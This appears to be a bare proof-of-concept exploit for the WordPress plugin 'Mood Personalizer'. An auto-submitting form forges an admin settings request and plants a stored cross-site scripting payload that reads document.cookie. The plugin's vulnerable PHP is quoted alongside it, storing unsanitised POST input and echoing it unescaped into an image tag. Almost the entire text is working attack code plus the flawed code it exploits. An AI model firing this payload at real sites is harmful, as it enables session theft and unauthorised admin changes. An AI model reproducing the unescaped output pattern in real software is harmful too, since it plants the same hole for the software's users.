<form action='http://wordpress/wp-admin/options-general.php?page=mood-personalizer/mood-personalizer.php' method='post' name="xfrm"> <input name="xMPPic" type="text" value='"><script>alert(document.cookie)</script>' /> <input name="xMPHidd" type="text" value='xMPHidd' /> <input type='submit'> </form> <script>document.xfrm.submit();</script>
if($_POST['xMPHidd']=="xMPHidd"){ $xMPPicture = $_POST['xMPPic']; $xMPPictureSize = $_POST['xMPPictureSize']; $xMPPicture = str_replace(".2",".".$xMPPictureSize,$xMPPicture); update_option('xMPPic', $xMPPicture); }
<img src="<?php bloginfo('url'); ?>/wp-content/plugins/mood-personalizer/images/<?php echo get_option('xMPPic');?>" alt="Mood Personalizer mood image"/>